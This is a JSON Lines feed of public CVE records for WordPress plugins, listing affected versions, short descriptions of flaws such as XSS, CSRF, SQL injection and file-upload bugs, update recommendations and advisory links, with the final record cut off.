{"CVE_ID":"CVE-2024-8714","slug":"slicewp","versionImpact":"1.1.20","versionEndExcluding":"1.1.21","description":"The WordPress Affiliates Plugin \u2014 SliceWP Affiliates plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.1.20. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45dd22d4-9a51-4569-a756-1f1a5f8626c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45dd22d4-9a51-4569-a756-1f1a5f8626c1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151062\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3151062\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/commissions\\\/class-list-table-commissions.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/commissions\\\/class-list-table-commissions.php#L544\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/visits\\\/class-list-table-visits.php#L396\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/visits\\\/class-list-table-visits.php#L396\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/payouts\\\/class-list-table-payments.php#L490\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slicewp\\\/tags\\\/1.1.20\\\/includes\\\/admin\\\/payouts\\\/class-list-table-payments.php#L490\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4269","slug":"svg-block","versionImpact":"1.1.19","versionEndExcluding":"1.1.20","description":"The SVG Block WordPress plugin before 1.1.20 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"Update to version 1.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aae7aa1-6170-45d8-903f-8520913276da\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8aae7aa1-6170-45d8-903f-8520913276da\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2006","slug":"image-upload-for-bbpress","versionImpact":"1.1.19","versionEndExcluding":"1.1.20","description":"The Inline Image Upload for BBPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the file uploading functionality in all versions up to, and including, 1.1.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This may be exploitable by unauthenticated attackers when the \"Allow guest users without accounts to create topics and replies\" setting is enabled.","recommendation":"Update to version 1.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-upload-for-bbpress\\\/tags\\\/1.1.19\\\/bbp-image-upload.php#L136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-upload-for-bbpress\\\/tags\\\/1.1.19\\\/bbp-image-upload.php#L136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df09af41-399a-4878-8420-721f1198d895?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/df09af41-399a-4878-8420-721f1198d895?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11416","slug":"wip-incoming-lite","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The WIP Incoming Lite plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the save_option() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wip-incoming-lite\\\/trunk\\\/core\\\/includes\\\/class-panel.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wip-incoming-lite\\\/trunk\\\/core\\\/includes\\\/class-panel.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc949922-7bfa-4704-9038-cf4b5262f864?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc949922-7bfa-4704-9038-cf4b5262f864?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10818","slug":"jsfiddle-shortcode","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The JSFiddle Shortcode WordPress plugin before 1.1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aafd152c-1a05-4191-a1bc-b802d801ca03\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aafd152c-1a05-4191-a1bc-b802d801ca03\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12162","slug":"gallery-for-ultimate-member","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The Video & Photo Gallery for Ultimate Member plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204552\\\/#file8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3204552\\\/#file8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204552%40gallery-for-ultimate-member&new=3204552%40gallery-for-ultimate-member&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204552%40gallery-for-ultimate-member&new=3204552%40gallery-for-ultimate-member&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b588b8d0-5d71-4e95-ad97-821e47b013c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b588b8d0-5d71-4e95-ad97-821e47b013c8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3610","slug":"wp-child-theme-generator","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The WP Child Theme Generator plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wctg_easy_child_theme() function in all versions up to, and including, 1.1.1. This makes it possible for unauthenticated attackers to create a blank child theme and activate it cause the site to whitescreen.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/581e6686-a103-43f6-aa99-6a9862d98837?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/581e6686-a103-43f6-aa99-6a9862d98837?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-child-theme-generator\\\/trunk\\\/wp-easy-child\\\/wp-easy-child.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-child-theme-generator\\\/trunk\\\/wp-easy-child\\\/wp-easy-child.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-child-theme-generator\\\/tags\\\/1.1.1&new_path=\\\/wp-child-theme-generator\\\/tags\\\/1.1.2&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/wp-child-theme-generator\\\/tags\\\/1.1.1&new_path=\\\/wp-child-theme-generator\\\/tags\\\/1.1.2&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-56302","slug":"convertcalculator","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ConvertCalculator ConvertCalculator for WordPress allows Stored XSS.This issue affects ConvertCalculator for WordPress: from n\/a through 1.1.1.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/convertcalculator\\\/vulnerability\\\/wordpress-convertcalculator-for-wordpress-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/convertcalculator\\\/vulnerability\\\/wordpress-convertcalculator-for-wordpress-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4321","slug":"pdf-generator-for-wp","versionEndExcluding":"1.1.2","description":"The PDF Generator for WordPress plugin before 1.1.2 includes a vendored dompdf example file which is susceptible to Reflected Cross-Site Scripting and could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ac1259c-86d9-428b-ba98-7f3d07910644\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ac1259c-86d9-428b-ba98-7f3d07910644\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11882","slug":"faq-and-answers","versionImpact":"1.1.0","versionEndExcluding":"1.1.2","description":"The FAQ And Answers \u2013 Create Frequently Asked Questions Area on WP Sites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'faq' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206469%40faq-and-answers&new=3206469%40faq-and-answers&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3206469%40faq-and-answers&new=3206469%40faq-and-answers&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f19fa-f3d9-41e9-94f5-9d817330f1ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f7f19fa-f3d9-41e9-94f5-9d817330f1ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-52370","slug":"hive-support","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Hive Support Hive Support \u2013 WordPress Help Desk allows Upload a Web Shell to a Web Server.This issue affects Hive Support \u2013 WordPress Help Desk: from n\/a through 1.1.1.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hive-support\\\/wordpress-hive-support-wordpress-help-desk-live-chat-ai-chat-bot-plugin-for-wordpress-plugin-1-1-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hive-support\\\/wordpress-hive-support-wordpress-help-desk-live-chat-ai-chat-bot-plugin-for-wordpress-plugin-1-1-1-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10115","slug":"woosidebars-sbm-converter","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"A vulnerability, which was classified as problematic, was found in WooSidebars Sidebar Manager Converter Plugin up to 1.1.1 on WordPress. This affects the function process_request of the file classes\/class-woosidebars-sbm-converter.php. The manipulation leads to open redirect. It is possible to initiate the attack remotely. Upgrading to version 1.1.2 is able to address this issue. The patch is named a0efb4ffb9dfe2925b889c1aa5ea40b4abbbda8a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-230655.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230655\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230655\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars-sbm-converter\\\/commit\\\/a0efb4ffb9dfe2925b889c1aa5ea40b4abbbda8a\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/woosidebars-sbm-converter\\\/commit\\\/a0efb4ffb9dfe2925b889c1aa5ea40b4abbbda8a\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230655\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230655\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13812","slug":"anps_theme_plugin","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The The Anps Theme plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.1.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/anpsthemes.com\\\/\",\"name\":\"https:\\\/\\\/anpsthemes.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5349096b-4897-4019-9eba-a959a42f03f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5349096b-4897-4019-9eba-a959a42f03f0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11913","slug":"bp-activity-plus-reloaded","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The Activity Plus Reloaded for BuddyPress plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 1.1.1 via the 'ajax_preview_link' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-activity-plus-reloaded\\\/tags\\\/1.1.2\\\/src\\\/handlers\\\/class-bpapr-preview-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-activity-plus-reloaded\\\/tags\\\/1.1.2\\\/src\\\/handlers\\\/class-bpapr-preview-handler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69485409-8e91-4651-b9b8-69beb2364fa8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69485409-8e91-4651-b9b8-69beb2364fa8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11254","slug":"accelerated-mobile-pages","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The AMP for WP \u2013 Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93\\\/includes\\\/disqus.html?rev=3024147#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/accelerated-mobile-pages\\\/tags\\\/1.0.93\\\/includes\\\/disqus.html?rev=3024147#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da82149-c827-4574-8269-b2b798edca59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5da82149-c827-4574-8269-b2b798edca59?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6550","slug":"gravity-forms-multiple-form-instances","versionImpact":"1.1.1","versionEndExcluding":"1.1.2","description":"The Gravity Forms: Multiple Form Instances plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.1.1. This is due to the plugin leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 1.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec761eb-6bd9-4c19-a98d-cb4738922a84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec761eb-6bd9-4c19-a98d-cb4738922a84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-multiple-form-instances\\\/trunk\\\/tests\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gravity-forms-multiple-form-instances\\\/trunk\\\/tests\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114842%40gravity-forms-multiple-form-instances&new=3114842%40gravity-forms-multiple-form-instances&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3114842%40gravity-forms-multiple-form-instances&new=3114842%40gravity-forms-multiple-form-instances&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10540","slug":"bookingpress-appointment-booking","versionImpact":"1.1.16","versionEndExcluding":"1.1.17","description":"The Appointment Booking Calendar Plugin and Scheduling Plugin \u2013 BookingPress plugin for WordPress is vulnerable to SQL Injection via the 'service' parameter of the bookingpress_form shortcode in all versions up to, and including, 1.1.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.1.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21690b9c-ffec-4195-8c0f-2b1801552bc6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21690b9c-ffec-4195-8c0f-2b1801552bc6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress.php#L358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/class.bookingpress.php#L358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php#L3683\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php#L3683\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php#L4620\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php#L4620\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179229\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3179229\\\/bookingpress-appointment-booking\\\/trunk\\\/core\\\/classes\\\/frontend\\\/class.bookingpress_appointment_bookings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0389","slug":"calculated-fields-form","versionImpact":"1.1.150","versionEndExcluding":"1.1.151","description":"The Calculated Fields Form WordPress plugin before 1.1.151 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.1.151, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/090a3922-febc-4294-82d2-d8339d461893\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/090a3922-febc-4294-82d2-d8339d461893\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25215","slug":"ari-adminer","versionImpact":"1.1.14","versionEndExcluding":"1.1.15","description":"The ARI-Adminer plugin for WordPress is vulnerable to authorization bypass due to a lack of file access controls in nearly every file of the plugin in versions up to, and including, 1.1.14. This makes it possible for unauthenticated attackers to call the files directly and perform a wide variety of unauthorized actions such as accessing a site's database and making changes.","recommendation":"Update to version 1.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67ad04d4-49ef-4bc4-b3b0-f2752566145e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/67ad04d4-49ef-4bc4-b3b0-f2752566145e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2065317%40ari-adminer&new=2065317%40ari-adminer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2065317%40ari-adminer&new=2065317%40ari-adminer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5932","slug":"travelpayouts","versionImpact":"1.1.13","versionEndExcluding":"1.1.14","description":"The Travelpayouts: All Travel Brands in One Place WordPress plugin before 1.1.14 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.1.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16fbca64-cc35-455e-bfef-d1f28857f991\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/16fbca64-cc35-455e-bfef-d1f28857f991\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5934","slug":"travelpayouts","versionImpact":"1.1.12","versionEndExcluding":"1.1.13","description":"The Travelpayouts: All Travel Brands in One Place WordPress plugin before 1.1.13 does not have CSRF check in place when importing settings from the v1, which could allow attackers to make a logged in admin update some settings via a CSRF attack","recommendation":"Update to version 1.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a45cdba-df41-457e-bff9-2d6d89776dd0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2a45cdba-df41-457e-bff9-2d6d89776dd0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7605","slug":"helloasso","versionImpact":"1.1.10","versionEndExcluding":"1.1.11","description":"The HelloAsso plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ha_ajax' function in all versions up to, and including, 1.1.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to update plugin options, potentially disrupting the service.","recommendation":"Update to version 1.1.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1690631b-0e5d-45d1-9db6-6ac426874762?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1690631b-0e5d-45d1-9db6-6ac426874762?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/helloasso\\\/trunk\\\/admin\\\/class-hello-asso-admin.php#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/helloasso\\\/trunk\\\/admin\\\/class-hello-asso-admin.php#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145151\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145151\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4509","slug":"content-control","versionEndExcluding":"1.1.10","description":"The Content Control WordPress plugin before 1.1.10 does not validate and escapes some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as a contributor to perform Stored Cross-Site Scripting attacks, which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90baba2e-a64f-4725-b76c-3aed94b18910\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/90baba2e-a64f-4725-b76c-3aed94b18910\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1915","slug":"wp-responsive-thumbnail-slider","versionEndExcluding":"1.1.10","description":"The Thumbnail carousel slider WordPress plugin before 1.1.10 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting vulnerability which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0487c3f6-1a3c-4089-a614-15138f52f69b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0487c3f6-1a3c-4089-a614-15138f52f69b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5641","slug":"one-click-order-reorder","versionImpact":"1.1.9","versionEndExcluding":"1.1.10","description":"The One Click Order Re-Order plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ced_ocor_save_general_setting' function in all versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the plugin settings, including adding stored cross-site scripting.","recommendation":"Update to version 1.1.10, or a newer patched 